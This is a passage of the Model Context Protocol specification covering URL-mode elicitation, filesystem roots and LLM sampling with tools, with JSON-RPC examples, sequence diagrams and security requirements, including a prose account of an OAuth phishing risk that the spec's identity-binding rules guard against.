of band and the client is not aware of the outcome until and unless the server sends a notification indicating completion.
### Completion Notifications for URL Mode Elicitation
Servers **MAY** send a `notifications/elicitation/complete` notification when an
out-of-band interaction started by URL mode elicitation is completed. This allows clients to react programmatically if appropriate.
Servers sending notifications:
* **MUST** only send the notification to the client that initiated the elicitation request.
* **MUST** include the `elicitationId` established in the original `elicitation/create` request.
Clients:
* **MUST** ignore notifications referencing unknown or already-completed IDs.
* **MAY** wait for this notification to automatically retry requests that received a [URLElicitationRequiredError](#error-handling), update the user interface, or otherwise continue an interaction.
* **SHOULD** still provide manual controls that let the user retry or cancel the original request (or otherwise resume interacting with the client) if the notification never arrives.
#### Example
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/elicitation/complete",
"params": {
"elicitationId": "550e8400-e29b-41d4-a716-446655440000"
}
}
```
### URL Elicitation Required Error
When a request cannot be processed until an elicitation is completed, the server **MAY** return a [`URLElicitationRequiredError`](#error-handling) (code `-32042`) to indicate to the client that a URL mode elicitation is required. The server **MUST NOT** return this error except when URL mode elicitation is required.
The error **MUST** include a list of elicitations that are required to complete before the original can be retried.
Any elicitations returned in the error **MUST** be URL mode elicitations and have an `elicitationId` property.
**Error Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"error": {
"code": -32042, // URL_ELICITATION_REQUIRED
"message": "This request requires more information.",
"data": {
"elicitations": [
{
"mode": "url",
"elicitationId": "550e8400-e29b-41d4-a716-446655440000",
"url": "https://mcp.example.com/connect?elicitationId=550e8400-e29b-41d4-a716-446655440000",
"message": "Authorization is required to access your Example Co files."
}
]
}
}
}
```
## Message Flow
### Form Mode Flow
```mermaid theme={null}
sequenceDiagram
participant User
participant Client
participant Server
Note over Server: Server initiates elicitation
Server->>Client: elicitation/create (mode: form)
Note over User,Client: Present elicitation UI
User-->>Client: Provide requested information
Note over Server,Client: Complete request
Client->>Server: Return user response
Note over Server: Continue processing with new information
```
### URL Mode Flow
```mermaid theme={null}
sequenceDiagram
participant UserAgent as User Agent (Browser)
participant User
participant Client
participant Server
Note over Server: Server initiates elicitation
Server->>Client: elicitation/create (mode: url)
Client->>User: Present consent to open URL
User-->>Client: Provide consent
Client->>UserAgent: Open URL
Client->>Server: Accept response
Note over User,UserAgent: User interaction
UserAgent-->>Server: Interaction complete
Server-->>Client: notifications/elicitation/complete (optional)
Note over Server: Continue processing with new information
```
### URL Mode With Elicitation Required Error Flow
```mermaid theme={null}
sequenceDiagram
participant UserAgent as User Agent (Browser)
participant User
participant Client
participant Server
Client->>Server: tools/call
Note over Server: Server needs authorization
Server->>Client: URLElicitationRequiredError
Note over Client: Client notes the original request can be retried after elicitation
Client->>User: Present consent to open URL
User-->>Client: Provide consent
Client->>UserAgent: Open URL
Note over User,UserAgent: User interaction
UserAgent-->>Server: Interaction complete
Server-->>Client: notifications/elicitation/complete (optional)
Client->>Server: Retry tools/call (optional)
```
## Response Actions
Elicitation responses use a three-action model to clearly distinguish between different user actions. These actions apply to both form and URL elicitation modes.
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"action": "accept", // or "decline" or "cancel"
"content": {
"propertyName": "value",
"anotherProperty": 42
}
}
}
```
The three response actions are:
1. **Accept** (`action: "accept"`): User explicitly approved and submitted with data
* For form mode: The `content` field contains the submitted data matching the requested schema
* For URL mode: The `content` field is omitted
* Example: User clicked "Submit", "OK", "Confirm", etc.
2. **Decline** (`action: "decline"`): User explicitly declined the request
* The `content` field is typically omitted
* Example: User clicked "Reject", "Decline", "No", etc.
3. **Cancel** (`action: "cancel"`): User dismissed without making an explicit choice
* The `content` field is typically omitted
* Example: User closed the dialog, clicked outside, pressed Escape, browser failed to load, etc.
Servers should handle each state appropriately:
* **Accept**: Process the submitted data
* **Decline**: Handle explicit decline (e.g., offer alternatives)
* **Cancel**: Handle dismissal (e.g., prompt again later)
## Implementation Considerations
### Statefulness
Most practical uses of elicitation require that the server maintain state about users:
* Whether required information has been collected (e.g., the user's display name via form mode elicitation)
* Status of resource access (e.g., API keys or a payment flow via URL mode elicitation)
Servers implementing elicitation **MUST** securely associate this state with individual users following the guidelines in the [security best practices](../basic/security_best_practices) document. Specifically:
* State **MUST NOT** be associated with session IDs alone
* State storage **MUST** be protected against unauthorized access
* For remote MCP servers, user identification **MUST** be derived from credentials acquired via [MCP authorization](../basic/authorization) when possible (e.g. `sub` claim)
The examples in this section are non-normative and illustrate potential uses
of elicitation. Implementers should adapt these patterns to their specific
requirements while maintaining security best practices.
### URL Mode Elicitation for Sensitive Data
For servers that interact with external APIs requiring sensitive information (e.g., credentials, payment information), URL mode elicitation provides a secure mechanism for users to provide this information without exposing it to the MCP client.
In this pattern:
1. The server directs users to a secure web page (served over HTTPS)
2. The page presents a branded form UI on a domain the user trusts
3. Users enter sensitive credentials directly into the secure form
4. The server stores credentials securely, bound to the user's identity
5. Subsequent MCP requests use these stored credentials for API access
This approach ensures that sensitive credentials never pass through the LLM context, MCP client or any intermediate MCP servers, reducing the risk of exposure through client-side logging or other attack vectors.
### URL Mode Elicitation for OAuth Flows
URL mode elicitation enables a pattern where MCP servers act as OAuth clients to third-party resource servers.
Authorization with external APIs enabled by URL mode elicitation is separate from [MCP authorization](../basic/authorization). MCP servers **MUST NOT** rely on URL mode elicitation to authorize users for themselves.
#### Understanding the Distinction
* **MCP Authorization**: Required OAuth flow between the MCP client and MCP server (covered in the [authorization specification](../basic/authorization))
* **External (third-party) Authorization**: Optional authorization between the MCP server and a third-party resource server, initiated via URL mode elicitation
In external authorization, the server acts as both:
* An OAuth resource server (to the MCP client)
* An OAuth client (to the third-party resource server)
Example scenario:
* An MCP client connects to an MCP server
* The MCP server integrates with various different third-party services
* When the MCP client calls a tool that requires access to a third-party service, the MCP server needs credentials for that service
The critical security requirements are:
1. **The third-party credentials MUST NOT transit through the MCP client**: The client must never see third-party credentials to protect the security boundary
2. **The MCP server MUST NOT use the client's credentials for the third-party service**: That would be [token passthrough](../basic/security_best_practices#token-passthrough), which is forbidden
3. **The user MUST authorize the MCP server directly**: The interaction happens outside the MCP protocol, without involving the MCP client
4. **The MCP server is responsible for tokens**: The MCP server is responsible for storing and managing the third-party tokens obtained through the URL mode elicitation (in other words, the MCP server must be stateful).
Credentials obtained via URL mode elicitation are distinct from the MCP server credentials used by the MCP client. The MCP server **MUST NOT** transmit credentials obtained through URL mode elicitation to the MCP client.
For additional background, refer to the [token passthrough
section](../basic/security_best_practices#token-passthrough) of the Security
Best Practices document to understand why MCP servers cannot act as
pass-through proxies.
#### Implementation Pattern
When implementing external authorization via URL mode elicitation:
1. The MCP server generates an authorization URL, acting as an OAuth client to the third-party service
2. The MCP server stores internal state that associates (binds) the elicitation request with the user's identity.
3. The MCP server sends a URL mode elicitation request to the client with a URL that can start the authorization flow.
4. The user completes the OAuth flow directly with the third-party authorization server
5. The third-party authorization server redirects back to the MCP server
6. The MCP server securely stores the third-party tokens, bound to the user's identity
7. Future MCP requests can leverage these stored tokens for API access to the third-party resource server
The following is a non-normative example of how this pattern could be implemented:
```mermaid theme={null}
sequenceDiagram
participant User
participant UserAgent as User Agent (Browser)
participant 3AS as 3rd Party AS
participant 3RS as 3rd Party RS
participant Client as MCP Client
participant Server as MCP Server
Client->>Server: tools/call
Note over Server: Needs 3rd-party authorization for user
Note over Server: Store state (bind the elicitation request to the user)
Server->>Client: URLElicitationRequiredError (mode: "url", url: "https://mcp.example.com/connect?...")
Note over Client: Client notes the tools/call request can be retried later
Client->>User: Present consent to open URL
User->>Client: Provide consent
Client->>UserAgent: Open URL
Client->>Server: Accept response
UserAgent->>Server: Load connect route
Note over Server: Confirm: user is logged into MCP Server or MCP AS Confirm: elicitation user matches session user
Server->>UserAgent: Redirect to third-party authorization endpoint
UserAgent->>3AS: Load authorize route
Note over 3AS,User: User interaction (OAuth flow): User consents to scoped MCP Server access
3AS->>UserAgent: redirect to MCP Server's redirect_uri
UserAgent->>Server: load redirect_uri page
Note over Server: Confirm: redirect_uri belongs to MCP Server
Server->>3AS: Exchange authorization code for OAuth tokens
3AS->>Server: Grants tokens
Note over Server: Bind tokens to MCP user identity
Server-->>Client: notifications/elicitation/complete (optional)
Client->>Server: Retry tools/call
Note over Server: Retrieve token bound to user identity
Server->>3RS: Call 3rd-party API
```
This pattern maintains clear security boundaries while enabling rich integrations with third-party services that require user authorization.
## Error Handling
Servers **MUST** return standard JSON-RPC errors for common failure cases:
* When a request cannot be processed until an elicitation is completed: `-32042` (`URLElicitationRequiredError`)
Clients **MUST** return standard JSON-RPC errors for common failure cases:
* Server sends an `elicitation/create` request with a mode not declared in client capabilities: `-32602` (Invalid params)
## Security Considerations
1. Servers **MUST** bind elicitation requests to the client and user identity
2. Clients **MUST** provide clear indication of which server is requesting information
3. Clients **SHOULD** implement user approval controls
4. Clients **SHOULD** allow users to decline elicitation requests at any time
5. Clients **SHOULD** implement rate limiting
6. Clients **SHOULD** present elicitation requests in a way that makes it clear what information is being requested and why
### Safe URL Handling
MCP servers requesting elicitation:
1. **MUST NOT** include sensitive information about the end-user, including credentials, personal identifiable information, etc., in the URL sent to the client in a URL elicitation request.
2. **MUST NOT** provide a URL which is pre-authenticated to access a protected resource, as the URL could be used to impersonate the user by a malicious client.
3. **SHOULD NOT** include URLs intended to be clickable in any field of a form mode elicitation request.
4. **SHOULD** use HTTPS URLs for non-development environments.
These server requirements ensure that client implementations have clear rules about when to present a URL to the user, so that the client-side rules (below) can be consistently applied.
Clients implementing URL mode elicitation **MUST** handle URLs carefully to prevent users from unknowingly clicking malicious links.
When handling URL mode elicitation requests, MCP clients:
1. **MUST NOT** automatically pre-fetch the URL or any of its metadata.
2. **MUST NOT** open the URL without explicit consent from the user.
3. **MUST** show the full URL to the user for examination before consent.
4. **MUST** open the URL provided by the server in a secure manner that does not enable the client or LLM to inspect the content or user inputs.
For example, on iOS, [SFSafariViewController](https://developer.apple.com/documentation/safariservices/sfsafariviewcontroller) is good, but [WkWebView](https://developer.apple.com/documentation/webkit/wkwebview) is not.
5. **SHOULD** highlight the domain of the URL to mitigate subdomain spoofing.
6. **SHOULD** have warnings for ambiguous/suspicious URIs (i.e., containing Punycode).
7. **SHOULD NOT** render URLs as clickable in any field of an elicitation request, except for the `url` field in a URL elicitation request (with the restrictions detailed above).
### Identifying the User
Servers **MUST NOT** rely on client-provided user identification without server verification, as this can be forged.
Instead, servers **SHOULD** follow [security best practices](../basic/security_best_practices).
Non-normative examples:
* Incorrect: Treat user input like "I am [joe@example.com](mailto:joe@example.com)" as authoritative
* Correct: Rely on [authorization](../basic/authorization) to identify the user
### Form Mode Security
1. Servers **MUST NOT** request sensitive information (passwords, API keys, etc.) via form mode
2. Clients **SHOULD** validate all responses against the provided schema
3. Servers **SHOULD** validate received data matches the requested schema
#### Phishing
URL mode elicitation returns a URL that an attacker can use to send to a victim. The MCP Server **MUST** verify the identity of the user who opens the URL before accepting information.
Typically identity verification is done by leveraging the [MCP authorization server](../basic/authorization) to identify the user, through a session cookie or equivalent in the browser.
For example, URL mode elicitation may be used to perform OAuth flows where the server acts as an OAuth client of another resource server. Without proper mitigation, the following phishing attack is possible:
1. A malicious user (Alice) connected to a benign server triggers an elicitation request
2. The benign server generates an authorization URL, acting as an OAuth client of a third-party authorization server
3. Alice's client displays the URL and asks for consent
4. Instead of clicking on the link, Alice tricks a victim user (Bob) of the same benign server into clicking it
5. Bob opens the link and completes the authorization, thinking they are authorizing their own connection to the benign server
6. The benign server receives a callback/redirect form the third-party authorization server, and assumes it's Alice's request
7. The tokens for the third-party server are bound to Alice's session and identity, instead of Bob's, resulting in an account takeover
To prevent this attack, the server **MUST** ensure that the user who started the elicitation request (the end-user who is accessing the server via the MCP client) is the same user who completes the authorization flow.
There are many ways to achieve this and the best way will depend on the specific implementation.
As a common, non-normative example, consider a case where the MCP server is accessible via the web and desires to perform a third-party authorization code flow.
To prevent the phishing attack, the server would create a URL mode elicitation to `https://mcp.example.com/connect?elicitationId=...` rather than the third-party authorization endpoint.
This "connect URL" must ensure the user who opened the page is the same user who the elicitation was generated for.
It would, for example, check that the user has a valid session cookie and that the session cookie is for the same user who was using the MCP client to generate the URL mode elicitation.
This could be done by comparing the authoritative subject (`sub` claim) from the MCP server's authorization server to the subject from the session cookie.
Once that page ensures the same user, it can send the user to the third-party authorization server at `https://example.com/authorize?...` where a normal OAuth flow can be completed.
In other cases, the server may not be accessible via the web and may not be able to use a session cookie to identify the user.
In this case, the server must use a different mechanism to identify the user who opens the elicitation URL is the same user who the elicitation was generated for.
In all implementations, the server **MUST** ensure that the mechanism to determine the user's identity is resilient to attacks where an attacker can modify the elicitation URL.
# Roots
Source: https://modelcontextprotocol.io/specification/2025-11-25/client/roots
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) provides a standardized way for clients to expose
filesystem "roots" to servers. Roots define the boundaries of where servers can operate
within the filesystem, allowing them to understand which directories and files they have
access to. Servers can request the list of roots from supporting clients and receive
notifications when that list changes.
## User Interaction Model
Roots in MCP are typically exposed through workspace or project configuration interfaces.
For example, implementations could offer a workspace/project picker that allows users to
select directories and files the server should have access to. This can be combined with
automatic workspace detection from version control systems or project files.
However, implementations are free to expose roots through any interface pattern that
suits their needs—the protocol itself does not mandate any specific user
interaction model.
## Capabilities
Clients that support roots **MUST** declare the `roots` capability during
[initialization](/specification/2025-11-25/basic/lifecycle#initialization):
```json theme={null}
{
"capabilities": {
"roots": {
"listChanged": true
}
}
}
```
`listChanged` indicates whether the client will emit notifications when the list of roots
changes.
## Protocol Messages
### Listing Roots
To retrieve roots, servers send a `roots/list` request:
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "roots/list"
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"roots": [
{
"uri": "file:///home/user/projects/myproject",
"name": "My Project"
}
]
}
}
```
### Root List Changes
When roots change, clients that support `listChanged` **MUST** send a notification:
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/roots/list_changed"
}
```
## Message Flow
```mermaid theme={null}
sequenceDiagram
participant Server
participant Client
Note over Server,Client: Discovery
Server->>Client: roots/list
Client-->>Server: Available roots
Note over Server,Client: Changes
Client--)Server: notifications/roots/list_changed
Server->>Client: roots/list
Client-->>Server: Updated roots
```
## Data Types
### Root
A root definition includes:
* `uri`: Unique identifier for the root. This **MUST** be a `file://` URI in the current
specification.
* `name`: Optional human-readable name for display purposes.
Example roots for different use cases:
#### Project Directory
```json theme={null}
{
"uri": "file:///home/user/projects/myproject",
"name": "My Project"
}
```
#### Multiple Repositories
```json theme={null}
[
{
"uri": "file:///home/user/repos/frontend",
"name": "Frontend Repository"
},
{
"uri": "file:///home/user/repos/backend",
"name": "Backend Repository"
}
]
```
## Error Handling
Clients **SHOULD** return standard JSON-RPC errors for common failure cases:
* Client does not support roots: `-32601` (Method not found)
* Internal errors: `-32603`
Example error:
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"error": {
"code": -32601,
"message": "Roots not supported",
"data": {
"reason": "Client does not have roots capability"
}
}
}
```
## Security Considerations
1. Clients **MUST**:
* Only expose roots with appropriate permissions
* Validate all root URIs to prevent path traversal
* Implement proper access controls
* Monitor root accessibility
2. Servers **SHOULD**:
* Handle cases where roots become unavailable
* Respect root boundaries during operations
* Validate all paths against provided roots
## Implementation Guidelines
1. Clients **SHOULD**:
* Prompt users for consent before exposing roots to servers
* Provide clear user interfaces for root management
* Validate root accessibility before exposing
* Monitor for root changes
2. Servers **SHOULD**:
* Check for roots capability before usage
* Handle root list changes gracefully
* Respect root boundaries in operations
* Cache root information appropriately
# Sampling
Source: https://modelcontextprotocol.io/specification/2025-11-25/client/sampling
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) provides a standardized way for servers to request LLM
sampling ("completions" or "generations") from language models via clients. This flow
allows clients to maintain control over model access, selection, and permissions while
enabling servers to leverage AI capabilities—with no server API keys necessary.
Servers can request text, audio, or image-based interactions and optionally include
context from MCP servers in their prompts.
## User Interaction Model
Sampling in MCP allows servers to implement agentic behaviors, by enabling LLM calls to
occur *nested* inside other MCP server features.
Implementations are free to expose sampling through any interface pattern that suits
their needs—the protocol itself does not mandate any specific user interaction
model.
For trust & safety and security, there **SHOULD** always
be a human in the loop with the ability to deny sampling requests.
Applications **SHOULD**:
* Provide UI that makes it easy and intuitive to review sampling requests
* Allow users to view and edit prompts before sending
* Present generated responses for review before delivery
## Tools in Sampling
Servers can request that the client's LLM use tools during sampling by providing a `tools` array and optional `toolChoice` configuration in their sampling requests. This enables servers to implement agentic behaviors where the LLM can call tools, receive results, and continue the conversation - all within a single sampling request flow.
Clients **MUST** declare support for tool use via the `sampling.tools` capability to receive tool-enabled sampling requests. Servers **MUST NOT** send tool-enabled sampling requests to Clients that have not declared support for tool use via the `sampling.tools` capability.
## Capabilities
Clients that support sampling **MUST** declare the `sampling` capability during
[initialization](/specification/2025-11-25/basic/lifecycle#initialization):
**Basic sampling:**
```json theme={null}
{
"capabilities": {
"sampling": {}
}
}
```
**With tool use support:**
```json theme={null}
{
"capabilities": {
"sampling": {
"tools": {}
}
}
}
```
**With context inclusion support (soft-deprecated):**
```json theme={null}
{
"capabilities": {
"sampling": {
"context": {}
}
}
}
```
The `includeContext` parameter values `"thisServer"` and `"allServers"` are
soft-deprecated. Servers **SHOULD** avoid using these values (e.g. can just
omit `includeContext` since it defaults to `"none"`), and **SHOULD NOT** use
them unless the client declares `sampling.context` capability. These values
may be removed in future spec releases.
## Protocol Messages
### Creating Messages
To request a language model generation, servers send a `sampling/createMessage` request:
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "sampling/createMessage",
"params": {
"messages": [
{
"role": "user",
"content": {
"type": "text",
"text": "What is the capital of France?"
}
}
],
"modelPreferences": {
"hints": [
{
"name": "claude-3-sonnet"
}
],
"intelligencePriority": 0.8,
"speedPriority": 0.5
},
"systemPrompt": "You are a helpful assistant.",
"maxTokens": 100
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"role": "assistant",
"content": {
"type": "text",
"text": "The capital of France is Paris."
},
"model": "claude-3-sonnet-20240307",
"stopReason": "endTurn"
}
}
```
### Sampling with Tools
The following diagram illustrates the complete flow of sampling with tools, including the multi-turn tool loop:
```mermaid theme={null}
sequenceDiagram
participant Server
participant Client
participant User
participant LLM
Note over Server,Client: Initial request with tools
Server->>Client: sampling/createMessage (messages + tools)
Note over Client,User: Human-in-the-loop review
Client->>User: Present request for approval
User-->>Client: Approve/modify
Client->>LLM: Forward request with tools
LLM-->>Client: Response with tool_use (stopReason: "toolUse")
Client->>User: Present tool calls for review
User-->>Client: Approve tool calls
Client-->>Server: Return tool_use response
Note over Server: Execute tool(s)
Server->>Server: Run get_weather("Paris") Run get_weather("London")
Note over Server,Client: Continue with tool results
Server->>Client: sampling/createMessage (history + tool_results + tools)
Client->>User: Present continuation
User-->>Client: Approve
Client->>LLM: Forward with tool results
LLM-->>Client: Final text response (stopReason: "endTurn")
Client->>User: Present response
User-->>Client: Approve
Client-->>Server: Return final response
Note over Server: Server processes result (may continue conversation...)
```
To request LLM generation with tool use capabilities, servers include `tools` and optionally `toolChoice` in the request:
**Request (Server -> Client):**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "sampling/createMessage",
"params": {
"messages": [
{
"role": "user",
"content": {
"type": "text",
"text": "What's the weather like in Paris and London?"
}
}
],
"tools": [
{
"name": "get_weather",
"description": "Get current weather for a city",
"inputSchema": {
"type": "object",
"properties": {
"city": {
"type": "string",
"description": "City name"
}
},
"required": ["city"]
}
}
],
"toolChoice": {
"mode": "auto"
},
"maxTokens": 1000
}
}
```
**Response (Client -> Server):**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"role": "assistant",
"content": [
{
"type": "tool_use",
"id": "call_abc123",
"name": "get_weather",
"input": {
"city": "Paris"
}
},
{
"type": "tool_use",
"id": "call_def456",
"name": "get_weather",
"input": {
"city": "London"
}
}
],
"model": "claude-3-sonnet-20240307",
"stopReason": "toolUse"
}
}
```
### Multi-turn Tool Loop
After receiving tool use requests from the LLM, the server typically:
1. Executes the requested tool uses.
2. Sends a new sampling request with the tool results appended
3. Receives the LLM's response (which might contain new tool uses)
4. Repeats as many times as needed (server might cap the maximum number of iterations, and e.g. pass `toolChoice: {mode: "none"}` on the last iteration to force a final result)
**Follow-up request (Server -> Client) with tool results:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"method": "sampling/createMessage",
"params": {
"messages": [
{
"role": "user",
"content": {
"type": "text",
"text": "What's the weather like in Paris and London?"
}
},
{
"role": "assistant",
"content": [
{
"type": "tool_use",
"id": "call_abc123",
"name": "get_weather",
"input": { "city": "Paris" }
},
{
"type": "tool_use",
"id": "call_def456",
"name": "get_weather",
"input": { "city": "London" }
}
]
},
{
"role": "user",
"content": [
{
"type": "tool_result",
"toolUseId": "call_abc123",
"content": [
{
"type": "text",
"text": "Weather in Paris: 18°C, partly cloudy"
}
]
},
{
"type": "tool_result",
"toolUseId": "call_def456",
"content": [
{
"type": "text",
"text": "Weather in London: 15°C, rainy"
}
]
}
]
}
],
"tools": [
{
"name": "get_weather",
"description": "Get current weather for a city",
"inputSchema": {
"type": "object",
"properties": {
"city": { "type": "string" }
},
"required": ["city"]
}
}
],
"maxTokens": 1000
}
}
```
**Final response (Client -> Server):**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"result": {
"role": "assistant",
"content": {
"type": "text",
"text": "Based on the current weather data:\n\n- **Paris**: 18°C and partly cloudy - quite pleasant!\n- **London**: 15°C and rainy - you'll want an umbrella.\n\nParis has slightly warmer and drier conditions today."
},
"model": "claude-3-sonnet-20240307",
"stopReason": "endTurn"
}
}
```
## Message Content Constraints
### Tool Result Messages
When a user message contains tool results (type: "tool\_result"), it **MUST** contain ONLY tool results. Mixing tool results with other content types (text, image, audio) in the same message is not allowed.
This constraint ensures compatibility with provider APIs that use dedicated roles for tool results (e.g., OpenAI's "tool" role, Gemini's "function" role).
**Valid - single tool result:**
```json theme={null}
{
"role": "user",
"content": {
"type": "tool_result",
"toolUseId": "call_123",
"content": [{ "type": "text", "text": "Result data" }]
}
}
```
**Valid - multiple tool results:**
```json theme={null}
{
"role": "user",
"content": [
{
"type": "tool_result",
"toolUseId": "call_123",
"content": [{ "type": "text", "text": "Result 1" }]
},
{
"type": "tool_result",
"toolUseId": "call_456",
"content": [{ "type": "text", "text": "Result 2" }]
}
]
}
```
**Invalid - mixed content:**
```json theme={null}
{
"role": "user",
"content": [
{
"type": "text",
"text": "Here are the results:"
},
{
"type": "tool_result",
"toolUseId": "call_123",
"content": [{ "type": "text", "text": "Result data" }]
}
]
}
```
### Tool Use and Result Balance
When using tool use in sampling, every assistant message containing `ToolUseContent` blocks **MUST** be followed by a user message that consists entirely of `ToolResultContent` blocks, with each tool use (e.g. with `id: $id`) matched by a corresponding tool result (with `toolUseId: $id`), before any other message.
This requirement ensures:
* Tool uses are always resolved before the conversation continues
* Provider APIs can concurrently process multiple tool uses and fetch their results in parallel
* The conversation maintains a consistent request-response pattern
**Example valid sequence:**
1. User message: "What's the weather like in Paris and London?"
2. Assistant message: `ToolUseContent` (`id: "call_abc123", name: "get_weather", input: {city: "Paris"}`) + `ToolUseContent` (`id: "call_def456", name: "get_weather", input: {city: "London"}`)
3. User message: `ToolResultContent` (`toolUseId: "call_abc123", content: "18°C, partly cloudy"`) + `ToolResultContent` (`toolUseId: "call_def456", content: "15°C, rainy"`)
4. Assistant message: Text response comparing the weather in both cities
**Invalid sequence - missing tool result:**
1. User message: "What's the weather like in Paris and London?"
2. Assistant message: `ToolUseContent` (`id: "call_abc123", name: "get_weather", input: {city: "Paris"}`) + `ToolUseContent` (`id: "call_def456", name: "get_weather", input: {city: "London"}`)
3. User message: `ToolResultContent` (`toolUseId: "call_abc123", content: "18°C, partly cloudy"`) ← Missing result for call\_def456
4. Assistant message: Text response (invalid - not all tool uses were resolved)
## Cross-API Compatibility
The sampling specification is designed to work across multiple LLM provider APIs (Claude, OpenAI, Gemini, etc.). Key design decisions for compatibility:
### Message Roles
MCP uses two roles: "user" and "assistant".
Tool use requests are sent in CreateMessageResult with the "assistant" role.
Tool results are sent back in messages with the "user" role.
Messages with tool results cannot contain other kinds of content.
### Tool Choice Modes
`CreateMessageRequest.params.toolChoice` controls the tool use ability of the model:
* `{mode: "auto"}`: Model decides whether to use tools (default)
* `{mode: "required"}`: Model MUST use at least one tool before completing
* `{mode: "none"}`: Model MUST NOT use any tools
### Parallel Tool Use
MCP allows models to make multiple tool use requests in parallel (returning an array of `ToolUseContent`). All major provider APIs support this:
* **Claude**: Supports parallel tool use natively
* **OpenAI**: Supports parallel tool calls (can be disabled with `parallel_tool_calls: false`)
* **Gemini**: Supports parallel function calls natively
Implementations wrapping providers that support disabling parallel tool use MAY expose this as an extension, but it is not part of the core MCP specification.
## Message Flow
```mermaid theme={null}
sequenceDiagram
participant Server
participant Client
participant User
participant LLM
Note over Server,Client: Server initiates sampling
Server->>Client: sampling/createMessage
Note over Client,User: Human-in-the-loop review
Client->>User: Present request for approval
User-->>Client: Review and approve/modify
Note over Client,LLM: Model interaction
Client->>LLM: Forward approved request
LLM-->>Client: Return generation
Note over Client,User: Response review
Client->>User: Present response for approval
User-->>Client: Review and approve/modify
Note over Server,Client: Complete request
Client-->>Server: Return approved response
```
## Data Types
### Messages
Sampling messages can contain:
#### Text Content
```json theme={null}
{
"type": "text",
"text": "The message content"
}
```
#### Image Content
```json theme={null}
{
"type": "image",
"data": "base64-encoded-image-data",
"mimeType": "image/jpeg"
}
```
#### Audio Content
```json theme={null}
{
"type": "audio",
"data": "base64-encoded-audio-data",
"mimeType": "audio/wav"
}
```
### Model Preferences
Model selection in MCP requires careful abstraction since servers and clients may use
different AI providers with distinct model offerings. A server cannot simply request a
specific model by name since the client may not have access to that exact model or may
prefer to use a different provider's equivalent model.
To solve this, MCP implements a preference system that combines abstract capability
priorities with optional model hints:
#### Capability Priorities
Servers express their needs through three normalized priority values (0-1):
* `costPriority`: How important is minimizing costs? Higher values prefer cheaper models.
* `speedPriority`: How important is low latency? Higher values prefer faster models.
* `intelligencePriority`: How important are advanced capabilities? Higher values prefer
more capable models.
#### Model Hints
While priorities help select models based on characteristics, `hints` allow servers to
suggest specific models or model families:
* Hints are treated as substrings that can match model names flexibly
* Multiple hints are evaluated in order of preference
* Clients **MAY** map hints to equivalent models from different providers
* Hints are advisory—clients make final model selection
For example:
```json theme={null}
{
"hints": [
{ "name": "claude-3-sonnet" }, // Prefer Sonnet-class models
{ "name": "claude" } // Fall back to any Claude model
],
"costPriority": 0.3, // Cost is less important
"speedPriority": 0.8, // Speed is very important
"intelligencePriority": 0.5 // Moderate capability needs
}
```
The client processes these preferences to select an appropriate model from its available
options. For instance, if the client doesn't have access to Claude models but has Gemini,
it might map the sonnet hint to `gemini-1.5-pro` based on similar capabilities.
## Error Handling
Clients **SHOULD** return errors for common failure cases:
* User rejected sampling request: `-1`
* Tool result missing in request: `-32602` (Invalid params)
* Tool results mixed with other content: `-32602` (Invalid params)
Example errors:
```json theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"error": {
"code": -1,
"message": "User rejected sampling request"
}
}
```
```json theme={null}
{
"jsonrpc": "2.0",
"id": 4,
"error": {
"code": -32602,
"message": "Tool result missing in request"
}
}
```
## Security Considerations
1. Clients **SHOULD** implement user approval controls
2. Both parties **SHOULD** validate message content
3. Clients **SHOULD** respect model preference hints
4. Clients **SHOULD** implement rate limiting
5. Both parties **MUST** handle sensitive data appropriately
When tools are used in sampling, additional security considerations apply:
6. Servers **MUST** ensure that when replying to a `stopReason: "toolUse"`, each `ToolUseContent` item is responded to with a `ToolResultContent` item with a matching `toolUseId`, and that the user message contains only tool results (no other content types)
7. Both parties **SHOULD** implement iteration limits for tool loops
# Specification
Source: https://modelcontextprotocol.io/specification/2025-11-25/index
[Model Context Protocol](https://modelcontextprotocol.io) (MCP) is an open protocol that
enables seamless integration between LLM applications and external data sources and
tools. Whether you're building an AI-powered IDE, enhancing a chat interface, or creating
custom AI workflows, MCP provides a standardized way to connect LLMs with the context
they need.
This specification defines the authoritative protocol requirements, based on the
TypeScript schema in
[schema.ts](https://github.com/modelcontextprotocol/specification/blob/main/schema/2025-11-25/schema.ts).
For implementation guides and examples, visit
[modelcontextprotocol.io](https://modelcontextprotocol.io).
The key words "MUST", "MUST NOT", "REQUIRED", "SHALL", "SHALL NOT", "SHOULD", "SHOULD
NOT", "RECOMMENDED", "NOT RECOMMENDED", "MAY", and "OPTIONAL" in this document are to be
interpreted as described in [BCP 14](https://datatracker.ietf.org/doc/html/bcp14)
\[[RFC2119](https://datatracker.ietf.org/doc/html/rfc2119)]
\[[RFC8174](https://datatracker.ietf.org/doc/html/rfc8174)] when, and only when, they
appear in all capitals, as shown here.
## Overview
MCP provides a standardized way for applications to:
* Share contextual information with language models
* Expose tools and capabilities to AI systems
* Build composable integrations and workflows
The protocol uses [JSON-RPC](https://www.jsonrpc.org/) 2.0 messages to establish
communication between:
* **Hosts**: LLM applications that initiate connections
* **Clients**: Connectors within the host application
* **Servers**: Services that provide context and capabilities
MCP takes some inspiration from the
[Language Server Protocol](https://microsoft.github.io/language-server-protocol/), which
standardizes how to add support for programming languages across a whole ecosystem of
development tools. In a similar way, MCP standardizes how to integrate additional context
and tools into the ecosystem of AI applications.
## Key Details
### Base Protocol
* [JSON-RPC](https://www.jsonrpc.org/) message format
* Stateful connections
* Server and client capability negotiation
### Features
Servers offer any of the following features to clients:
* **Resources**: Context and data, for the user or the AI model to use
* **Prompts**: Templated messages and workflows for users
